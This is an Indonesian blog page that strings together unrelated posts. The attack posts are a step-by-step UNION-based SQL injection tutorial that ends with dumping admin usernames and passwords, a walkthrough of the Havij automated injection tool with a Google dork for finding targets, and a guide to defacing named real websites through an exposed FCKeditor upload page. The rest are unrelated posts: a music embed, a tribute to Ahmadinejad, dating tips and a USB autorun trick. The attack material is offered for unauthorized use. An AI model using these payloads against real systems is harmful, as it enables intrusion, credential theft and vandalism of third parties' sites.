Hack Website With SQL Inject Tekhnik

SQL Injection adalah sebuah aksi hacking yang dilakukan diaplikasi client dengan cara memodifikasi perintah SQL yang ada dimemori aplikasi client dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Yang perlu diketahui sebelum melakukan SQL Injection pada MySQL: karakter: ' atau - comments: /* atau -- information_schema untuk versi: MySQL versi 5.x , tidak support untuk MySQL versi 4.x 

Step 1 : Carilah target 

Misal: [site]/berita.php?id=100

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.

contoh: [site]/berita.php?id=100' atau [site]/berita.php?id=-100 Sehingga muncul pesan error seperti berikut [ masih banyak lagi ]

Step 2 : Mencari dan menghitung jumlah table yang ada dalam databasenya... 

gunakan perintah: order by

Contoh: [site]/berita.php?id=-100+order+by+1--

atau [site]/berita.php?id=-100+order+by+1/*

Ceklah secara step by step (satupersatu)...

Misal: [site]/berita.php?id=-100+order+by+1-- 

[site]/berita.php?id=-100+order+by+2--

[site]/berita.php?id=-100+order+by+3--

[site]/berita.php?id=-100+order+by+4--

Sehingga muncul error atau hilang pesan error...

Misal: [site]/berita.php?id=-100+order+by+9--

Berarti yang kita ambil adalah sampai angka 8

Menjadi [site]/berita.php?id=-100+order+by+8--

Step 3 : Untuk mengeluarkan angka berapa yang muncul gunakan perintah union.

Karena tadi error sampai angka 9

Maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

Ok seumpama yg keluar angka 5

Gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi misal: 

[site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau [site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--

Lihat versi yang digunakan se'umpama versi 4 tinggalkan saja karena dalam versi 4 ini kita harus menebak sendiri table dan column yang ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

Untuk versi 5 berarti anda beruntung tak perlu menebak table dan column seperti versi 4 karena di versi 5 ini bisa menggunakan perintah From+Information_schema..

Step 4 : Untuk menampilkan table yang ada pada web tersebut adalah perintah table_name >>> dimasukan pada angka yangg keluar tadi perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

Code: [site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables

Seumpama table yang muncul adalah "admin"

Step 5 : Untuk menampilkan semua isi dari table tersebut adalah perintah group_concat(table_name) >>> dimasukan pada angka yang keluar tadi.

Perintah +from+information_schema.tables+where+table_schema=database() (dimasukan setelah angka terakhir).

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.​tables+where+table_schema=database()--

Step 6 : Perintah group_concat(column_name) (dimasukan pada angka yang keluar tadi) 

perintah:

+from+information_schema.columns+where+table_name=0xhexa-- (dimasukan setelah angka terakhir).

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema​.columns+where+table_name=0xhexa--

Pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya Website yg digunakan untuk konversi bisa cari di gugel.

Contoh kata yang ingin dikonversi yaitu admin maka akan menjadi 61646D696E 

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema​.columns+where+table_name=0x61646D696E--

Step 7 : Memunculkan apa yang tadi telah dikeluarkan dari table yaitu dengan cara perintah:

concat_ws(0x3a,hasil isi column yg mau dikeluarkan) (dimasukan pada angka yg keluar tadi)

Perintah +from+(nama table berasal) (dimasukan setelah angka terakhir)

Contoh : [site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--

Contoh kata yang keluar adalah id,username,password

Contoh : 

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin-- 

Step 8 : Tahap terakhir mencari halaman admin atau login.

Musik with Swf File Autoplay

Buat yang blognya mau ada musik yg autoplay, copas kode dibawah ke kode HTML blog lu:

<embed src="http://divine-music.info/musicfiles/Dashboard%20Confessionals%20-%20Vindicated.swf" autostart="TRUE" loop="TRUE" width="1" height="1" align="CENTER"></embed>

Kalo mau ganti file musik swf nya, bisa cari file musiknya: Dimari

Ganti kode:

"http://divine-music.info/bla-bla..Vindicated.swf
DENGAN Kode swf yang lu suka.

Thanks to Mama

Enjoy With Havij Tool

Langkah pertama, cari dulu website yang akan dijadikan target.
Buka google, ketik misalkan : inurl:index.php?id=

Setelah kita dapat web target, cek menggunakan tanda petik – ' 1.

Website ternyata error, klo seperti itu berarti website vuln. Ok qta lanjutkan ke tahap selanjut’y. Buka Tools havij copas url web yg tadi sudah kita cek.

1. Setelah di copas URL’y lalu Klik icon Analyze. Tunggu sampai selesai. (Biarkan sampai status kembali I’m IDLE). Kalo dagh selesai nanti tampilan’y akan seperti ini :

2. Selanjut’y Klik icon Tables, tampilan’y seperti ini :

3. lanjutkan dengan mengKlik Get DBs Screenshoot seperti di bawah ini :

OK guys...udah keliatan tuwh nama2 dari database’y, tgl dipilih target yg ingin qta perkosa. Qta perkosa Database yg bernama Administrator aja.

4. Klik DB Administrator lalu klik Get Tables, nanti akan keluar tables2’y seperti ini :

 
 5. Next sekarang qta cari columns’y. Cara’y klik hasil yg keluar tadi beberapa columns yg keluar dari tables Administrator seperti ini : isdeleted,tingkat,password,user_name,id
Qta centang user_name and password’y saja lalu klik Get Data.
Ok guys selesai akhir’y password and user_name Admin dah nongol tuwh.

Tools ini memang cukup banyak fungsi’y, selain sql injection secara otomatic. Tools ini mempunyai banyak fitur lain’y antara lain untuk mencari halaman admin ato mencari password hash MD5.

Cukup sampe sini aja yak, klo untuk mencari halaman admin’y ato MD5 silahkan di otak-atik sendiri aja. Cara’y mudah kok.

Mendeface Website opencart

Ok..Disini Saya Akan Postingkan..
Cara Mendeface Website opencart..
Dan anda Juga Bisa Mencari Bug Nya Di Google..


Cara 1 : Anda Mencari Notepad Untuk Menghedit file deface san HTML anda..
Cara 2 : Beri Nama File Upload Anda [index.htm]Or[index.html] Dan Bisa Juga Index.php
Cara 3 : Anda Bisa ambil Di Bawa Deface Upload Yg Anda Ingin Kan.

Copy

http://www.speedbikeracing.it/admin/view/javascript/fckeditor/editor/filemanager/connectors/uploadtest.html">admin/view/javascript/fckeditor/editor/filemanager/connectors/uploadtest.html

Jika sudah Fix semua .. coba deh upload ke sini:
http://www.speedbikeracing.it/

tambahkan file tadi:  admin/view/javascript/fckeditor/editor/filemanager/connectors/uploadtest.html

maka akan menjadi seperti ini

http://www.speedbikeracing.it/admin/view/javascript/fckeditor/editor/filemanager/connectors/uploadtest.html

Ket: 

Conector ASP nya di ganti dengan PHP



Resource Type dari "None" Rubah ke "File" ntar kalo udah di upload ..

Coba test:  http://www.speedbikeracing.it/ (file html lo).htm

Untuk melihat hasilnya  : http://www.speedbikeracing.it/c0ba1n.html

Bisa juga deface opencart lain ..
Dengan dork:  "Powered by open cart"
Cari di google.

Selamat mencoba.
Nih Situs percobaannya: http://www.fresiaviaggi.it/


Source Code

Ahmadinejad : Berprilaku Miskin Namun Kaya Hati

Benarkah Presiden Iran, Mahmoud Ahmadinejad adalah Presiden termiskin di dunia?

Jawabannya bisa ya dan bisa tidak. Dijawab ya, karena memang dialah presiden di dunia dengan kekayaan sebagai berikut: kekayaan dan propertinya terdiri dari sedan Peugeot 504 tahun 1977 dan sebuah rumah sederhana warisan ayahnya 40 tahun yang lalu di sebuah daerah kumuh di Teheran!

Kalau dijawab tidak, maka dialah presiden di dunia tempat paling kaya bagi banyak pejabat negara manapun untuk "bercermin" alias introspeksi diri. Banyak masyarakat menginginkan pejabat-pejabat di negaranya untuk berprilaku sebagaimana Ahmadinejad, "meminjam" cermin Ahmadinejad untuk melihat diri mereka. Dan setelah bercemin kepada pribadi presiden tersebut mereka pun lalu hendaknya menjadi pejabat yang sangat sederhana dan "amanah" dalam pengertian kasat mata.

"Ketika bercermin, saya melihat orang di dalam cermin itu dan mengatakan kepadanya: Ingat, kau tak lebih dari seorang pelayan, hari di depanmu penuh dengan tanggung jawab yang berat, yaitu melayani bangsa Iran," kata Ahmadinejad ketika diwawancarai TV Fox (AS).

Gambaran tentang Ahmadinejad, memang membuat orang ternganga dan terheran-heran. Lebih dari ternganga, mungkin banyak pejabat kita yang "terpelongo". Apakah masih ada "manusia" seperti dia? Seorang presiden di suatu negara pastilah akan merasa "gerah" setrelah mengetahui kehidupan presiden Iran yang namanya mendunia ini. Apalagi jika presiden itu diminta pendapatnya untuk mau mengikuti gaya hidup Ahmadinejad.

Yang membuat orang terpelongo adalah saat pertama kali menduduki kantor kepresidenan, ia menyumbangkan seluruh karpet istana Iran yang sangat tinggi nilainya kepada masjid di Teheran dan menggantikannya dengan karpet biasa yang mudah dibersihkan.

Di istana, ada ruangan yang sangat besar untuk menerima dan menghormati tamu VIP, lalu ia memerintahkan untuk menutup ruang tersebut dan memintan pada protokoler untuk menggantinya dengan ruangan biasa dengan dua kursi kayu yang sederhana tetapi terlihat impresif.

Pertama kali menjabat presiden Iran yang langsung dilakukannya adalah mengumumkan kekayaannya tadi, yang sama sekali tak sebanding dengan lazimnya kekayaan seorang pejabat di negara-negara lain umumnya. Jangankan dibandingkan dengan presiden, dengan anggota legislatif di Indonesia pun ia "tak layak diperbandingkan". Padahal, kalau dilihat dari sisi reputasi, ia adalah salah satu pemimpin dunia yang amat berpengaruh dalam percaturan dunia saat ini.

Sebagai presiden, ia masih tinggal di rumahnya. Di banyak kesempatan ia menyempatkan diri bercengkerama dengan petugas kebersihan di sekitar rumah dan kantor kepresidenannya.

Rekening banknya pun bersaldo minimum, dan satu-satunnya uang masuk baginya adalah uang gaji bulanannya. Gajinya sebagai dosen di sebuah universitas hanya senilai US$250.

Lalu, apakah yang sebenarnya ingin dikejar Ahmadinejad dengan menampilkan diri menjadi presiden sebuah Negara yang sangat penting secara strategis, ekonomis, politik dan pertahanan di kawasan Arab dan bahkan dunia itu?

Presiden ini malah tidak mengambil gajinya, alasannya adalah bahwa semua kesejahteraan adalah milik negara dan ia bertugas untuk menjaganya.

Satu hal yang membuat kagum staf kepresidenan adalah tas yg selalu dibawa sang presiden tiap hari yang selalu berisikan sarapan roti isi atau roti keju yang disiapkan istrinya dan memakannya dengan gembira, ia juga menghentikan kebiasaan menyediakan makanan yang dikhususkan untuk presiden.

Hal lain lagi yang ia ubah adalah kebijakan Pesawat Terbang Kepresidenan. Ia mengubahnya menjadi pesawat kargo sehingga dapat menghemat pajak masyarakat dan untuk dirinya, ia meminta terbang dengan pesawat terbang biasa dengan kelas ekonomi.

Ia juga menghentikan kebiasaan upacara karpet merah, sesi foto, atau publikasi pribadi, atau hal-hal seperti itu saat mengunjungi berbagai tempat di negaranya.

Saat harus menginap di hotel, ia meminta diberikan kamar tanpa tempat tidur yang tidak terlalu besar karena ia tidak suka tidur di atas kasur, tetapi lebih suka tidur di lantai beralaskan karpet dan selimut.

Ia kerap mengadakan rapat dengan menteri-menterinya untuk mendapatkan info tentang kegiatan dan efisiensi yang sudah dilakukan, dan ia memotong protokoler istana sehingga menteri-menterinya dapat masuk langsung ke ruangannya tanpa ada hambatan.

Saat ia meminta menteri-menterinya untuk datang kepadanya, mereka akan menerima sebuah dokumen yang ditandatangani yang berisikan arahan-arahan darinya, arahan tersebut terutama sekali menekankan mereka untuk tetap hidup sederhana dan disebutkan bahwa rekening pribadi maupun kerabat dekatnya akan diawasi, sehingga pada saat mereka akan berakhir masa jabatannya dapat meninggalkan kantornya dengan kepala tegak.

Apakah Ahmadinejad ingin menyindir banyak pejabat di seluruh dunia dengan berperilaku seperti itu atau ingin merendahkan posisi presiden?

Presiden Iran ini memang membuat orang terpelongo dan foto-foto kesederhanaan dirinya menyebar ke banyak negara termasuk Amerika Serikat yang amat memusuhi program-program pertahanan Iran di bawah kepemimpinannya.

Yang paling dipujakan orang terhadapnya adalah prilakunya di dalam mesjid. Dalam hal bermakmum dalam sholat, Anda akan sering melihat bahwa seorang presiden tidak duduk di baris paling muka. Pada kesempatan apa pun, ketika suara azan berkumandang, ia langsung mengerjakan sholat di mana pun ia berada meskipun hanya beralaskan karpet biasa. Tidak heran, ada sebuah foto Ahmadinejad sedang duduk melaksanakan sholat di pinggir sebuah jalan hanya beralasakan kain!

Ketika dia mengadakan hajatan besar yaitu menikahkan puteranya, pernikahan putra presiden itu tak menghabiskan milyaran rupiah seperti ketika putra seorang menteri di Indonesia menikah. Pernikahan itu, penikahan seorang putra presiden negara sestrategis seperti Iran, hanya layaknya pernikahan anak seorang kaum buruh.

Ada sebuah kuis: Apakah Anda seorang pejabat yang sanggup "meminjam cermin" Ahmadinejad, lalu mau "berprilaku miskin namun kaya hati, sekaya Ahmadinejad"? (W/Yunizar Nassyam).

 

Tidur hanya beralaskan karpet dan selimut

 Makanan buatan Istri yang di bawah ke istana dan makan di tempat sederhana (ruang makan)

Sholat bersama jamaah lain (Presiden tidak harus di shaf depan jika datang terlambat)

Ramah Dan Sopan Sewaktu Di wawancara Dengan Wartawan

 Semoga Presiden & Seluruh Mantri di Indonesia Mencontoh Kesederhanaan Beliau

 

Tips Nembak Cewe 100% Manjur

Buat yang lagi gencar PDKT, ada baiknya lu ikutin Tips dari gw untuk ngungkapin perasaan.

Okeey.... Baca bae-bae,, trus langsung praktekin...

Lo: "Kita kan Temen , aku boleh minta tolong ga? "

Target: "Boleh, emang apaan? "

Lo: "Aku mau nembak cewe nih , tp aku bingung nembaknya gimana

Target: " ya tembak aja lah , kamu kan cowo , pasti tau "

Lo: " iya sih,tp ini cewe special banget untuk aku , dia slalu ada untuk aku dan mampu buat aku jatuh cinta ama dia .. aku mau ngasih kata2 yg bener2 luar biasa untuk dia "

Target: " siapa orangnya? "

Lo: " ada laah , kamu ga mesti tau .. Orangnya cantik dan aku suka banget ama dia dari dulu "

Target: " ooh, gitu ya "

Lo: " gimana? bantuin dong ! "

Target: "Coba gini "would you be mine?"(apa aja yg dia bilang,ga harus ini)

Lo: " wah , terlalu simple .. yg lain dong , yg menurut kamu special kata-katanya "

Target: " "i love u , be my girl please" gimana? "

Lo: " simple banget nih. ato mungkin make versi aku aja ya?

Target: " emang versi kamu gimana? "

Lo : " pake versi remix , becanda deng :D "'ini versi aku , dengerin yah"

Lo : "Mungkin slama ini aku g bisa jadi sahabat yg baik untuk kamu , yg bisa hiburin kamu , buat kamu senang , ataupun bahagia .. tp apakah kamu tau? aku slalu merhatiin kamu , slalu pengen ada untuk kamu , dan menjadi sesuatu yg indah di hati kamu .. maaf kalo ucapan aku yg berikut buat kamu ilfil atau marah .. tp aku cuma mau ngucapin .. maukah kamu jadi kekasih aku, Blablabla (<--Nama Kecengan Lo)? "

Target: "Loh, kok nama aku? kamu ngirim ke siapa? "

Lo: " untuk Orang tercantik, blablabla (<-- blablabla itu nama dia)

Target: " hah? kamu nembak aku? berarti cewe yg kamu maksud aku ?"

Lo: " aku bukan nembak kamu , lebih halus lagi aku tuh nyatain perasaan aku ke kamu.. "

Target: " kamu serius ama aku? gak bercanda kan ? "

Lo: " ngapain aku bercanda ke kamu? "

Target: "Yawdah deh , aku juga mau kok jadi pacar kamu =) " (Pasti bingung nih yang nerimanya )

Lo: "Makasih ya , aku sayang kamu seorang"

Dan akhirnya kalian pun pacaran

Inget ya, usahakan Trik ini agar jitu dengan cara apapun, misalnya Pedekate dulu .. Waktu SMS tanyain dia "Lagi Apa?" "Ganggu ga ?" "klo aku sms kamu, cowo kamu marah ga?" (Biar Tau dia udah punya cowo apa belom) Lu jadi detektif amor dulu Hahahaha...

Tips diatas bisa lulus 100% Apabila Respon si target (ketika lo dan dia ngobrol) hampir persis dengan dialog diatas.

Namun ada kemungkinan meleset bahkan gagal apabila arah pembicaraannya seperti berikut:

Lo: "kita kan Temen , aku boleh minta tolong gak? "

Target: " kagak, males tolongin sampah kaya lo? "

Lo: " aku mau nembak cewe nih , tp aku bingung nembaknya gimana

Target: " najis, emang ada cewek yang mao sama lo? "

Lo: "Iya sih, tp ini cewe special banget untuk aku, dia slalu ada untuk aku dan mampu buat aku jatuh cinta ama dia .. aku mau ngasih kata2 yg bener2 luar biasa untuk dia "

Target: "Siapa emangnya?

Lo: "Ada lah , kamu ga mesti tau .. orangnya cantik dan aku suka banget ama dia dari dulu "

Target: " selera lo pasti ga bagus"

Lo: "gimana? bantuin dong !"

Target: "Mau jadi cewek gw?" bilang aja kaya gitu

Lo: "wah, terlalu simple .. yg lain dong , yg menurut kamu special kata-katanya "

Target: " "gw punya ferrari 4, villa real estate 3, gw boss extra joss, mau jadi cewek gw? "

Lo: " simple banget nih. ato mungkin make versi aku aja ya?

Target: " ah paling aneh-aneh versi lo? "

Lo : ''Ini versi aku , dengerin yach....
"mungkin slama ini aku g bisa jadi sahabat yg baik untuk kamu , yg bisa hiburin kamu , buat kamu senang , ataupun bahagia .. tp apakah kamu tau? aku slalu merhatiin kamu , slalu pengen ada untuk kamu , dan menjadi sesuatu yg indah di hati kamu .. maaf kalo ucapan aku yg berikut buat kamu ilfil atau marah .. tp aku cuma mau ngucapin .. maukah kamu jadi kekasih aku, Blablabla (<--Nama Kecengan lo)" :D

Target: " Jangan nama gw cok, GELI GW "

Lo: " untuk Orang tercantik, blablabla (<-- blablabla itu nama dia)

Target: " WOI NAJIS LO ?"


Lo: "aku bukan nembak kamu , lebih halus lagi aku tuh nyatain perasaan aku ke kamu.. "

Target: "bercanda lo, Sorry gw ga level sama lo" !!!

Lo: " ngapain aku bercanda ke kamu? "

Target: "Gw GA LEVEL SAMA LO BEGOK !!!"

Hahahahahahahaaa......

Kalo responnya kaya gitu, dijamin trik ini gagal 100% !!!

Keep Trying and never give up!

Tutorial Membuat Flashdisk Kebal Virus

Mungkin program ini sesuai dengan istilah yang ada, yaitu : "Sedia Payung Sebelum Hujan"

Oke, langsung aja ni ya sodara-sodara...

1. Buatlah sebuah folder dalam falshdisk anda, dan berikan nama "autorun.inf" (tanpa tanda kutip).

2. Masuk kedalam folder yang baru saja anda buat tersebut dan buatlah sebuah dokumen notepad didalamnya. Caranya klik kanan, pilih NEW > TEXT DOCUMENT, dan berikan sembarang nama untuk file yang baru saja anda buat (hasil akhirnya seperti pada gambar). Nama ini nantinya akan kita ganti dengan beberapa karakter khusus.

3. Setelah itu, kita akan membuka program CHARACTER MAP yang ada di START > ALL PROGRAMS > ACCESORIES > SYSTEM TOOLS > CHARACTER MAP.

Gambar...

4. Setelah CHARACTER MAP terbuka, pilih font yang ada embel2 unicode seperti Arial Unicode atau Lucida Sans Unicode. Scroll kebawah sampai anda melihat huruf2 Jepang, Korea,Cina, ato karakter2 aneh.

5. Pilih 4 atau 5 karakter yang anda inginkan, trus klik copy.

6. Ubah nama ato rename file teks yang telah anda buat pada langkah 2 diatas. Klik kanan pada file tersebut, pilih rename, selanjutnya tekan [CTRL] + [V]. Nama file pun berubah. Jangan kaget bila nantinya anda akan melihat karakter seperti tanda kotak2 saja. Ga papa kok, itu normal kok.

Dan Setelah di Rename....

7. Done !!!

Lebih paten lagi setelah trik diatas uda selesai dibuat, ubah atribut folder autorun.inf jadi super hidden. Caranya, buka command prompt trus ketik F: untuk masuk ke drive FD ente (nb: sesuaikan drive FD ente. kalo drive FD lo di G, ya ketik G: ). Setelah itu ketik "attrib +s +h autorun.inf" (tanpa kutip tentunya) untuk menjadikannya super hidden.

L: Kok bisa kebal virus ya?
G: Windows kan ga terima kalo ada 2 file yang mempunyai nama yang sama (smua orang juga tau kan). Nah, karena di FD kita uda ada nama autorun.inf, file lain ga boleh pake tu nama. Jadi virus uda ga bisa pake nama autorun.inf.

100% Virus Mental :D Hahahaha

 Oke Good Luck Everybody